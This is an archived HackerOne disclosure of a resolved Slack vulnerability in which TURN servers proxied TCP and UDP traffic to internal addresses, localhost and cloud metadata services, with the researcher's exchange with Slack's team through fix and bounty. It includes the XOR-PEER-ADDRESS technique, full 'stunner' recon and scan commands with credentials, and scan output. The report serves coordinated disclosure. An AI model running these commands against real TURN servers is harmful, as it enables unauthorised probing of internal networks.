

Slack disclosed on HackerOne: TURN server allows TCP and UDP...

Slack disclosed on HackerOne: TURN server allows TCP and UDP... - Author not stated, HackerOne.

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Content

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[#333419](#)

TURN server allows TCP and UDP proxying to internal network, localhost and meta-data services

Report

Summary by sandrogauci

[\[\[image: image\]\]\(https://hackerone.com/sandrogauci\)](#)

TURN server allowed proxying of TCP connections and UDP packets to internal Slack network and meta-data services on AWS.

Timeline

[\[\[image: sandrogauci\]\]\(https://hackerone.com/sandrogauci\)](#)

[sandrogauci](#)

submitted a report to [Slack](#).

April 4, 2018, 2:05pm UTC

The TURN servers used by Slack allow TCP connections and UDP packets to be proxied to the internal network. This gives an attacker the ability to scan and interact with internal systems.

The attacker may proxy TCP connections to the internal network by setting the XOR-PEER-ADDRESS of the TURN connect message (method `0x000A`, <https://tools.ietf.org/html/rfc6062#section-4.3>) to a private IPv4 address.

UDP packets may be proxied by setting the XOR-PEER-ADDRESS to a private IP in the TURN send message indication (method 0x0006 , <https://tools.ietf.org/html/rfc5766#section-10>).

Please check the attached report for additional details.

Impact

By abusing this feature an attacker will be able to read and potentially modify sensitive information in Slack's internal infrastructure. Typically, this security vulnerability has at least the same impact as an SSRF. However it is considered more useful from an attacker's point of view since attacks are not restricted to HTTP.

The hacker selected the **Server-Side Request Forgery (SSRF)** weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:

Can internal services be reached bypassing network access control? Yes

What internal services were accessible? Metadata, localhost, network services on the 10.0.0.0/8

Security Impact By abusing this feature an attacker will be able to read and potentially modify sensitive information in Slack's internal infrastructure. Typically, this security vulnerability has at least the same impact as an SSRF. However it is considered more useful from an attacker's point of view since attacks are not restricted to HTTP.

Note: vulnerability is not SSRF but open TURN proxy - this was the closest I could choose.

3 attachments

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F281909: [turn_tcp_proxy_response.pcapng](#)

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F281910: [report.md](#)

-

F281911: [turn_udp\(53\)_proxy_response.pcapng](#)

[[image: Sandro Gauci]](<https://hackerone.com/sandrogauci>)

[sandrogauci](#)

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April 19, 2018, 12:19pm UTC

[@fyunaz](#) thanks for spinning that test environment.

I have summarised your comments as follows:

- dev instance should only block special IP addresses and not all traffic
- same solution was deployed on production too
- please confirm with video that you are able to proxy to our internal network using UDP, with UDP response
- were you able to get a response from TCP port via TURN UDP?

- we have a test dev instance for your testing `z-slack-calls-orca-research1.slack-core.com`

My responses for each of the above:

- that is not what my tests seem to indicate
- production now seems to block TCP but not UDP on special addresses - see the below tests
- Please find the output from our tests and attached pcaps which I hope can help; do let me know if this is not enough and I'll dedicate some time for a video showing the same exact thing
- No we were not able to get a response from TCP port through TURN UDP; the protocol itself does not allow that
- thanks for the test dev instance

When I run our reconnaissance tool on the live environment, I see the following results:

Code•5.91 KiB

```
1stunner recon --username '1524160678:U3VE3T72Q' --password
'HrVL1a/ZswyyLH52nW6xql0/CTo=' --server udp://slack-calls-orca-bru-qxb0.slack-core.com:22466 2
3 4stunner v0.1 5Started on 2018-04-18T19:59:57+02:00 6 7stunner/proto> udp connection to
slack-calls-orca-bru-qxb0.slack-core.com:22466 successful 8stunner/proto> tcp connection to
slack-calls-orca-bru-qxb0.slack-core.com:22466 successful 9stunner/banners> Software banner:
None 10stunner/banners> Realm: slack.com 11stunner/allocate> udp allocate (invalid auth)
successful 12stunner/allocate> tcp allocate (invalid auth) successful 13stunner/allocate> udp recon
long term creds authentication successful 14stunner/allocate> udp reflexive transport address
91.64.185.21:40097 15stunner/allocate> tcp recon long term creds authentication failed
16stunner/allocate> udp recon short term creds authentication failed 17stunner/allocate> tcp
recon short term creds authentication failed 18stunner/binding> udp recon binding successful
19stunner/binding> reflexive transport address 91.64.185.21:58566 20stunner/binding> tcp recon
binding successful 21stunner/binding> reflexive transport address 91.64.185.21:37588
22stunner/channelbind> udp recon ChannelBind 8.8.8.8:80 successful 23stunner/channelbind>
tcp recon ChannelBind 8.8.8.8:80 failed 24stunner/channelbind> udp recon ChannelBind
169.254.169.254:80 successful 25stunner/channelbind> tcp recon ChannelBind
169.254.169.254:80 failed 26stunner/channelbind> udp recon ChannelBind 127.0.0.1:80 successful
27stunner/channelbind> tcp recon ChannelBind 127.0.0.1:80 failed 28stunner/channelbind> udp
recon ChannelBind 0.0.0.0:80 successful 29stunner/channelbind> tcp recon ChannelBind
0.0.0.0:80 failed 30stunner/channelbind> udp recon ChannelBind 10.0.0.1:80 successful
31stunner/channelbind> tcp recon ChannelBind 10.0.0.1:80 failed 32stunner/channelbind> udp
recon ChannelBind 100.64.0.0:80 successful 33stunner/channelbind> tcp recon ChannelBind
100.64.0.0:80 failed 34stunner/channelbind> udp recon ChannelBind 169.254.0.1:80 successful
35stunner/channelbind> tcp recon ChannelBind 169.254.0.1:80 failed 36stunner/channelbind>
udp recon ChannelBind 192.0.0.1:80 successful 37stunner/channelbind> tcp recon ChannelBind
192.0.0.1:80 failed 38stunner/channelbind> udp recon ChannelBind 192.0.2.1:80 successful
39stunner/channelbind> tcp recon ChannelBind 192.0.2.1:80 failed 40stunner/channelbind> udp
recon ChannelBind 192.88.99.1:80 successful 41stunner/channelbind> tcp recon ChannelBind
192.88.99.1:80 failed 42stunner/channelbind> udp recon ChannelBind 192.168.0.1:80 successful
43stunner/channelbind> tcp recon ChannelBind 192.168.0.1:80 failed 44stunner/channelbind>
udp recon ChannelBind 198.18.0.1:80 successful 45stunner/channelbind> tcp recon ChannelBind
```

198.18.0.1:80 failed 46stunner/channelbind> udp recon ChannelBind 198.51.100.1:80 successful
47stunner/channelbind> tcp recon ChannelBind 198.51.100.1:80 failed 48stunner/channelbind>
udp recon ChannelBind 203.0.113.1:80 successful 49stunner/channelbind> tcp recon ChannelBind
203.0.113.1:80 failed 50stunner/channelbind> udp recon ChannelBind 224.0.0.1:80 successful
51stunner/channelbind> tcp recon ChannelBind 224.0.0.1:80 failed 52stunner/channelbind> udp
recon ChannelBind 240.0.0.1:80 successful 53stunner/channelbind> tcp recon ChannelBind
240.0.0.1:80 failed 54stunner/channelbind> udp recon ChannelBind 255.255.255.255:80 successful
55stunner/channelbind> tcp recon ChannelBind 255.255.255.255:80 failed
56stunner/createpermission> udp recon CreatePermission 8.8.8.8:80 successful
57stunner/createpermission> tcp recon CreatePermission 8.8.8.8:80 failed
58stunner/createpermission> udp recon CreatePermission 169.254.169.254:80 successful
59stunner/createpermission> tcp recon CreatePermission 169.254.169.254:80 failed
60stunner/createpermission> udp recon CreatePermission 127.0.0.1:80 successful
61stunner/createpermission> tcp recon CreatePermission 127.0.0.1:80 failed
62stunner/createpermission> udp recon CreatePermission 0.0.0.0:80 successful
63stunner/createpermission> tcp recon CreatePermission 0.0.0.0:80 failed
64stunner/createpermission> udp recon CreatePermission 10.0.0.1:80 successful
65stunner/createpermission> tcp recon CreatePermission 10.0.0.1:80 failed
66stunner/createpermission> udp recon CreatePermission 100.64.0.0:80 successful
67stunner/createpermission> tcp recon CreatePermission 100.64.0.0:80 failed
68stunner/createpermission> udp recon CreatePermission 169.254.0.1:80 successful
69stunner/createpermission> tcp recon CreatePermission 169.254.0.1:80 failed
70stunner/createpermission> udp recon CreatePermission 192.0.0.1:80 successful
71stunner/createpermission> tcp recon CreatePermission 192.0.0.1:80 failed
72stunner/createpermission> udp recon CreatePermission 192.0.2.1:80 successful
73stunner/createpermission> tcp recon CreatePermission 192.0.2.1:80 failed
74stunner/createpermission> udp recon CreatePermission 192.88.99.1:80 successful
75stunner/createpermission> tcp recon CreatePermission 192.88.99.1:80 failed
76stunner/createpermission> udp recon CreatePermission 192.168.0.1:80 successful
77stunner/createpermission> tcp recon CreatePermission 192.168.0.1:80 failed
78stunner/createpermission> udp recon CreatePermission 198.18.0.1:80 successful
79stunner/createpermission> tcp recon CreatePermission 198.18.0.1:80 failed
80stunner/createpermission> udp recon CreatePermission 198.51.100.1:80 successful
81stunner/createpermission> tcp recon CreatePermission 198.51.100.1:80 failed
82stunner/createpermission> udp recon CreatePermission 203.0.113.1:80 successful
83stunner/createpermission> tcp recon CreatePermission 203.0.113.1:80 failed
84stunner/createpermission> udp recon CreatePermission 224.0.0.1:80 successful
85stunner/createpermission> tcp recon CreatePermission 224.0.0.1:80 failed
86stunner/createpermission> udp recon CreatePermission 240.0.0.1:80 successful
87stunner/createpermission> tcp recon CreatePermission 240.0.0.1:80 failed
88stunner/createpermission> udp recon CreatePermission 255.255.255.255:80 successful
89stunner/createpermission> tcp recon CreatePermission 255.255.255.255:80 failed

This means that the TURN `CreatePermission` command is allowed on UDP for all the special addresses. TCP has been disabled since our initial report and therefore we get failure for all

instances. To prove that this is still indeed a potential security problem, we ran a port 53 DNS scan as follows:

Code•1.03 KiB

```
1stunner turn peer scan --username '1524195624:U3VE3T72Q' --password
'R0vf5RdFuqHO/isgt/uA7oLcNdw=' --server udp://slack-calls-orca-bru-qxb0.slack-core.com:22466 --
scan-port-range 53 2 3 4stunner v0.1 5Started on 2018-04-19T10:40:32+02:00 6 7stunner>
Scanning 127.0.0.1/32 for 53 8 9Result from 127.0.0.1:53 10([uint8) (len=128 cap=1000) { 11
00000000 40 b3 81 80 00 01 00 06 00 00 00 00 03 77 77 77 |@.....www| 12 00000010 06 67 6f
6f 67 6c 65 03 63 6f 6d 00 00 01 00 01 |.google.com.....| 13 00000020 c0 0c 00 01 00 01 00 00 00 7f
00 04 4a 7d ce 93 |.....J}..| 14 00000030 c0 0c 00 01 00 01 00 00 00 7f 00 04 4a 7d ce 63
|.....J}.c| 15 00000040 c0 0c 00 01 00 01 00 00 00 7f 00 04 4a 7d ce 67 |.....J}.g| 16
00000050 c0 0c 00 01 00 01 00 00 00 7f 00 04 4a 7d ce 6a |.....J}.j| 17 00000060 c0 0c 00 01 00
01 00 00 00 7f 00 04 4a 7d ce 69 |.....J}.i| 18 00000070 c0 0c 00 01 00 01 00 00 00 7f 00 04 4a
7d ce 68 |.....J}.h| 19} 20 21stunner [info]> 1 payloads sent 221 seconds remaining until
shutdown % 23
```

Code•1.01 KiB

```
1stunner turn peer scan --username '1524195624:U3VE3T72Q' --password
'R0vf5RdFuqHO/isgt/uA7oLcNdw=' --server udp://slack-calls-orca-bru-qxb0.slack-core.com:22466 --
scan-port-range 53 --scan-ip-range 10.33.0.96 2 3 4stunner v0.1 5Started on 2018-04-
19T10:58:15+02:00 6 7stunner> Scanning 10.33.0.96 for 53 8 9stunner [info]> 1 payloads sent
10Result from 10.33.0.96:53 11([uint8) (len=128 cap=1000) { 12 00000000 40 b3 81 80 00 01 00 06
00 00 00 00 03 77 77 77 |@.....www| 13 00000010 06 67 6f 6f 67 6c 65 03 63 6f 6d 00 00 01 00
01 |.google.com.....| 14 00000020 c0 0c 00 01 00 01 00 00 00 12 00 04 4a 7d ce 68 |.....J}.h| 15
00000030 c0 0c 00 01 00 01 00 00 00 12 00 04 4a 7d ce 69 |.....J}.i| 16 00000040 c0 0c 00 01 00
01 00 00 00 12 00 04 4a 7d ce 93 |.....J}..| 17 00000050 c0 0c 00 01 00 01 00 00 00 12 00 04 4a
7d ce 67 |.....J}.g| 18 00000060 c0 0c 00 01 00 01 00 00 00 12 00 04 4a 7d ce 6a |.....J}.j| 19
00000070 c0 0c 00 01 00 01 00 00 00 12 00 04 4a 7d ce 63 |.....J}.c| 20}
```

The reconnaissance tool was also run on your dev environment and it gave the below output indicating that all traffic is being blocked, including traffic meant to go to an internet IP address such as Google's `8.8.8.8`. Log below:

Code•5.73 KiB

```
1stunner recon --username '1524195624:U3VE3T72Q' --password
'R0vf5RdFuqHO/isgt/uA7oLcNdw=' --server udp://z-slack-calls-orca-research1.slack-
core.com:22466 2 3stunner v0.1 4Started on 2018-04-19T10:37:18+02:00 5 6stunner/proto> udp
connection to z-slack-calls-orca-research1.slack-core.com:22466 successful 7stunner/proto> tcp
connection to z-slack-calls-orca-research1.slack-core.com:22466 successful 8stunner/banners>
Software banner: None 9stunner/banners> Realm: slack.com 10stunner/allocate> udp allocate
(invalid auth) successful 11stunner/allocate> tcp allocate (invalid auth) successful
12stunner/allocate> udp recon long term creds authentication successful 13stunner/allocate> udp
reflexive transport address 91.64.185.21:38635 14stunner/allocate> tcp recon long term creds
authentication failed 15stunner/allocate> udp recon short term creds authentication failed
16stunner/allocate> tcp recon short term creds authentication failed 17stunner/binding> udp
```

recon binding successful 18stunner/binding> reflexive transport address 91.64.185.21:51750
19stunner/binding> tcp recon binding successful 20stunner/binding> reflexive transport address
91.64.185.21:32972 21stunner/channelbind> udp recon ChannelBind 8.8.8.8:80 failed
22stunner/channelbind> tcp recon ChannelBind 8.8.8.8:80 failed 23stunner/channelbind> udp
recon ChannelBind 169.254.169.254:80 failed 24stunner/channelbind> tcp recon ChannelBind
169.254.169.254:80 failed 25stunner/channelbind> udp recon ChannelBind 127.0.0.1:80 failed
26stunner/channelbind> tcp recon ChannelBind 127.0.0.1:80 failed 27stunner/channelbind> udp
recon ChannelBind 0.0.0.0:80 failed 28stunner/channelbind> tcp recon ChannelBind 0.0.0.0:80
failed 29stunner/channelbind> udp recon ChannelBind 10.0.0.1:80 failed 30stunner/channelbind>
tcp recon ChannelBind 10.0.0.1:80 failed 31stunner/channelbind> udp recon ChannelBind
100.64.0.0:80 failed 32stunner/channelbind> tcp recon ChannelBind 100.64.0.0:80 failed
33stunner/channelbind> udp recon ChannelBind 169.254.0.1:80 failed 34stunner/channelbind>
tcp recon ChannelBind 169.254.0.1:80 failed 35stunner/channelbind> udp recon ChannelBind
192.0.0.1:80 failed 36stunner/channelbind> tcp recon ChannelBind 192.0.0.1:80 failed
37stunner/channelbind> udp recon ChannelBind 192.0.2.1:80 failed 38stunner/channelbind> tcp
recon ChannelBind 192.0.2.1:80 failed 39stunner/channelbind> udp recon ChannelBind
192.88.99.1:80 failed 40stunner/channelbind> tcp recon ChannelBind 192.88.99.1:80 failed
41stunner/channelbind> udp recon ChannelBind 192.168.0.1:80 failed 42stunner/channelbind>
tcp recon ChannelBind 192.168.0.1:80 failed 43stunner/channelbind> udp recon ChannelBind
198.18.0.1:80 failed 44stunner/channelbind> tcp recon ChannelBind 198.18.0.1:80 failed
45stunner/channelbind> udp recon ChannelBind 198.51.100.1:80 failed 46stunner/channelbind>
tcp recon ChannelBind 198.51.100.1:80 failed 47stunner/channelbind> udp recon ChannelBind
203.0.113.1:80 failed 48stunner/channelbind> tcp recon ChannelBind 203.0.113.1:80 failed
49stunner/channelbind> udp recon ChannelBind 224.0.0.1:80 failed 50stunner/channelbind> tcp
recon ChannelBind 224.0.0.1:80 failed 51stunner/channelbind> udp recon ChannelBind
240.0.0.1:80 failed 52stunner/channelbind> udp recon ChannelBind 255.255.255.255:80 failed
53stunner/channelbind> tcp recon ChannelBind 255.255.255.255:80 failed
54stunner/createpermission> udp recon CreatePermission 8.8.8.8:80 failed
55stunner/createpermission> tcp recon CreatePermission 8.8.8.8:80 failed
56stunner/createpermission> udp recon CreatePermission 169.254.169.254:80 failed
57stunner/createpermission> tcp recon CreatePermission 169.254.169.254:80 failed
58stunner/createpermission> udp recon CreatePermission 127.0.0.1:80 failed
59stunner/createpermission> tcp recon CreatePermission 127.0.0.1:80 failed
60stunner/createpermission> udp recon CreatePermission 0.0.0.0:80 failed
61stunner/createpermission> tcp recon CreatePermission 0.0.0.0:80 failed
62stunner/createpermission> udp recon CreatePermission 10.0.0.1:80 failed
63stunner/createpermission> tcp recon CreatePermission 10.0.0.1:80 failed
64stunner/createpermission> udp recon CreatePermission 100.64.0.0:80 failed
65stunner/createpermission> tcp recon CreatePermission 100.64.0.0:80 failed
66stunner/createpermission> udp recon CreatePermission 169.254.0.1:80 failed
67stunner/createpermission> tcp recon CreatePermission 169.254.0.1:80 failed
68stunner/createpermission> udp recon CreatePermission 192.0.0.1:80 failed
69stunner/createpermission> tcp recon CreatePermission 192.0.0.1:80 failed
70stunner/createpermission> udp recon CreatePermission 192.0.2.1:80 failed

71stunner/createpermission> tcp recon CreatePermission 192.0.2.1:80 failed
72stunner/createpermission> udp recon CreatePermission 192.88.99.1:80 failed
73stunner/createpermission> tcp recon CreatePermission 192.88.99.1:80 failed
74stunner/createpermission> udp recon CreatePermission 192.168.0.1:80 failed
75stunner/createpermission> tcp recon CreatePermission 192.168.0.1:80 failed
76stunner/createpermission> udp recon CreatePermission 198.18.0.1:80 failed
77stunner/createpermission> tcp recon CreatePermission 198.18.0.1:80 failed
78stunner/createpermission> udp recon CreatePermission 198.51.100.1:80 failed
79stunner/createpermission> tcp recon CreatePermission 198.51.100.1:80 failed
80stunner/createpermission> udp recon CreatePermission 203.0.113.1:80 failed
81stunner/createpermission> tcp recon CreatePermission 203.0.113.1:80 failed
82stunner/createpermission> udp recon CreatePermission 224.0.0.1:80 failed
83stunner/createpermission> tcp recon CreatePermission 224.0.0.1:80 failed
84stunner/createpermission> udp recon CreatePermission 240.0.0.1:80 failed
85stunner/createpermission> tcp recon CreatePermission 240.0.0.1:80 failed
86stunner/createpermission> udp recon CreatePermission 255.255.255.255:80 failed
87stunner/createpermission> tcp recon CreatePermission 255.255.255.255:80 failed 881 seconds remaining until shutdown %

Attached you will find two pcaps. One showing the DNS responses received from 127.0.0.1 and 10.33.0.96 on the live environment. Note that further research could indicate sensitive or vulnerable services on UDP so this is why I think its not just TCP that should be blocked for internal or special IP addresses.

The second pcap shows a similar test but done on the dev system that acutally blocks all traffic, including seemingly legitimate traffic to 8.8.8.8 . This, I'm afraid, would lead to problems for calls behind NAT that require TURN.

So to summarize:

- Live system is not vulnerable anymore for TCP; but UDP remains open
- Dev system is not vulnerable for either TCP or UDP; but also appears to block legitimate traffic

2 attachments

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F288620: [test-fix-port53-8.8.8.8-response.pcapng](#)

-

F288621: [live-fix-port53-127.0.0.1-10.33.0.96-response.pcapng](#)

[[image: fyunaz]](<https://hackerone.com/fyunaz>)

[fyunaz](#)

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April 19, 2018, 6:50pm UTC

@sandrogauci Thanks for your detail response, we are looking into this.

[[image: fyunaz]](<https://hackerone.com/fyunaz>)

fyunaz

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April 19, 2018, 11:30pm UTC

@sandrogauci We added a patch to the `z-slack-calls-orca-research1.slack-core.com` to make it work for a legitimate traffic. Can you please re-run the test to that host again and confirm that the vulnerability fixed and we are not blocking any legitimate traffic?

Thanks!

[[image: Sandro Gauci]](<https://hackerone.com/sandrogauci>)

sandrogauci

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April 20, 2018, 2:55am UTC

Hi @fyunaz glad that it helped. I have rerun the tool on the new patch and yes it does reflect the recommended change, i.e. it looks like a correct fix.

lines of interest from my test log:

Code•2.97 KiB

```
1stunner/proto> udp connection to z-slack-calls-orca-research1.slack-core.com:22466 successful
2stunner/proto> tcp connection to z-slack-calls-orca-research1.slack-core.com:22466 successful
3stunner/banners> Software banner: None 4stunner/banners> Realm: slack.com
5stunner/allocate> udp allocate (invalid auth) successful 6stunner/allocate> tcp allocate (invalid
auth) successful 7stunner/allocate> udp recon long term creds authentication successful
8stunner/allocate> udp reflexive transport address 91.64.185.21:38458 9...
10stunner/createpermission> udp recon CreatePermission 8.8.8.8:80 successful
11stunner/createpermission> tcp recon CreatePermission 8.8.8.8:80 failed
12stunner/createpermission> udp recon CreatePermission 169.254.169.254:80 failed
13stunner/createpermission> tcp recon CreatePermission 169.254.169.254:80 failed
14stunner/createpermission> udp recon CreatePermission 127.0.0.1:80 failed
15stunner/createpermission> tcp recon CreatePermission 127.0.0.1:80 failed
16stunner/createpermission> udp recon CreatePermission 0.0.0.0:80 failed
17stunner/createpermission> tcp recon CreatePermission 0.0.0.0:80 failed
18stunner/createpermission> udp recon CreatePermission 10.0.0.1:80 failed
19stunner/createpermission> tcp recon CreatePermission 10.0.0.1:80 failed
20stunner/createpermission> udp recon CreatePermission 100.64.0.0:80 failed
21stunner/createpermission> tcp recon CreatePermission 100.64.0.0:80 failed
22stunner/createpermission> udp recon CreatePermission 169.254.0.1:80 failed
23stunner/createpermission> tcp recon CreatePermission 169.254.0.1:80 failed
24stunner/createpermission> udp recon CreatePermission 192.0.0.1:80 failed
25stunner/createpermission> tcp recon CreatePermission 192.0.0.1:80 failed
26stunner/createpermission> udp recon CreatePermission 192.0.2.1:80 failed
27stunner/createpermission> tcp recon CreatePermission 192.0.2.1:80 failed
28stunner/createpermission> udp recon CreatePermission 192.88.99.1:80 failed
```


29stunner/createpermission> tcp recon CreatePermission 192.88.99.1:80 failed
30stunner/createpermission> udp recon CreatePermission 192.168.0.1:80 failed
31stunner/createpermission> tcp recon CreatePermission 192.168.0.1:80 failed
32stunner/createpermission> udp recon CreatePermission 198.18.0.1:80 failed
33stunner/createpermission> tcp recon CreatePermission 198.18.0.1:80 failed
34stunner/createpermission> udp recon CreatePermission 198.51.100.1:80 failed
35stunner/createpermission> tcp recon CreatePermission 198.51.100.1:80 failed
36stunner/createpermission> udp recon CreatePermission 203.0.113.1:80 failed
37stunner/createpermission> tcp recon CreatePermission 203.0.113.1:80 failed
38stunner/createpermission> udp recon CreatePermission 224.0.0.1:80 failed
39stunner/createpermission> tcp recon CreatePermission 224.0.0.1:80 failed
40stunner/createpermission> udp recon CreatePermission 240.0.0.1:80 failed
41stunner/createpermission> tcp recon CreatePermission 240.0.0.1:80 failed
42stunner/createpermission> udp recon CreatePermission 255.255.255.255:80 failed
43stunner/createpermission> tcp recon CreatePermission 255.255.255.255:80 failed

 (https://hackerone.com/fyunaz)

fyunaz

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April 20, 2018, 3:34am UTC

@sandrogauci Awesome! Thanks for confirming the patch works. We will continue working on this. I will keep you updated when we have additional information.

 (https://hackerone.com/sandrogauci)

sandrogauci

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April 20, 2018, 6:40am UTC

Excellent - yes do keep me up to date

 (https://hackerone.com/sandrogauci)

sandrogauci

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April 30, 2018, 6:36pm UTC

Hi @fyunaz - following up on the status of this one. Do you require anything else from our side?

 (https://hackerone.com/fyunaz)

fyunaz

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April 30, 2018, 10:58pm UTC

Hi @sandrogauci, No, there's nothing that we need from your end at this point. Our team is still working on the additional fix. We will let you know when we have additional information.

Thanks!

 (https://hackerone.com/fyunaz)

fyunaz

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May 11, 2018, 8:03pm UTC

Hi @sandrogauci,

Thanks for your patience. We have pushed the patch to all of our production servers. We added more strict rules and also verified that all of our Calls functionality works with the current settings. It might seem like we are blocking legitimate traffic but it's not. We are only allowing necessary traffic. Can you please re-test all of your test cases one more time to our prod server especially the UDP over TURN to access the DNS server?

Thanks!

 (https://hackerone.com/sandrogauci)

sandrogauci

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May 14, 2018, 7:38am UTC

Will test as soon as we can and get back to you.

 (https://hackerone.com/fyunaz)

fyunaz

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May 16, 2018, 4:53pm UTC

@sandrogauci, kindly following up on the status. Did you confirm the fix? I think we can close this issue but would be great if we can get your testing done before closing this.

 (https://hackerone.com/sandrogauci)

sandrogauci

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May 16, 2018, 5:31pm UTC

@fyunaz thanks for the follow up. I've been at a conference these last days and swamped with work. I think however I'll have time to verify the fixes sometime tomorrow. Do we test on live?

 (https://hackerone.com/fyunaz)

fyunaz

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May 16, 2018, 5:44pm UTC

@sandrogauci Tomorrow sounds good. And yes, please do the testing on prod (live) system. Let me know if you need more information.

Thanks!

[[image: Sandro Gauci]](https://hackerone.com/sandrogauci)
sandrogauci

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May 19, 2018, 7:47pm UTC

Hi @fyunaz - we have tested the fix and realised that the fix blocks everything but UDP packets towards the WebRTC gateway. We didn't find ways to exploit this configuration to get any responses and are happy to close this issue. Thanks for awaiting our confirmation. Hope that our feedback and various retests were valuable to you and your colleagues.

[[image: Sandro Gauci]](https://hackerone.com/sandrogauci)
sandrogauci

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May 21, 2018, 7:12am UTC

Just in case it was not clear from my response; I confirm that the fix appears to do the job.

[[image: fyunaz]](https://hackerone.com/fyunaz)
fyunaz

closed the report and changed the status to ****Resolved**.

May 21, 2018, 4:18pm UTC

Thank you for the confirmation and for your patience! We will resolve and reward shortly!

[[image: image]](https://hackerone.com/slack)
Slack

rewarded sandrogauci with a **\$3,500** bounty.

May 21, 2018, 9:52pm UTC

Thank you for your report!

The Slack Security Team

[[image: Sandro Gauci]](https://hackerone.com/sandrogauci)
sandrogauci

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January 21, 2020, 11:20am UTC

Hi @fyunaz can you make this report public please?

sandrogauci

requested to disclose this report.

January 31, 2020, 4am UTC

[[image: Bug Triage]](https://hackerone.com/bugtriage-josh)

bugtriage-josh

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February 25, 2020, 8:09pm UTC

Hey @sandrogauci,

We're going to temporarily cancel your disclosure request, as we are performing a review of high severity and above disclosures, and want give your report appropriate consideration before it becomes public. As soon as we complete our review, we will contact you about disclosure.

We apologize for the delay.

[[image: Bug Triage]](<https://hackerone.com/bugtriage-josh>)

bugtriage-josh

cancelled the request to disclose this report.

February 25, 2020, 8:09pm UTC

As noted above

[[image: Sandro Gauci]](<https://hackerone.com/sandrogauci>)

sandrogauci

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February 28, 2020, 2:45am UTC

Hi @bugtriage-josh - that comes unexpectedly as we were under the impression that you successfully resolved this issue 2 years ago. We have an educational presentation to give at Kamailio World and were hoping to use this report as an example of our contribution to the WebRTC security space. We're not interested in making Slack look bad of course; only to have practical and real examples to the VoIP/WebRTC developers in the audience.

Could you let me know when your review is planned to be complete so that we can prepare accordingly?

sandrogauci

requested to disclose this report.

March 4, 2020, 3:29pm UTC

[[image: Bug Triage]](<https://hackerone.com/bugtriage-josh>)

bugtriage-josh

agreed to disclose this report.

March 12, 2020, 12:15am UTC

Hey @sandrogauci

We should be good to go with disclosure now. Sorry about the delay and thank you for your patience.

This report has been disclosed.

March 12, 2020, 12:15am UTC

Archived from <https://hackerone.com/reports/333419>. Rendered offline from the local Markdown copy.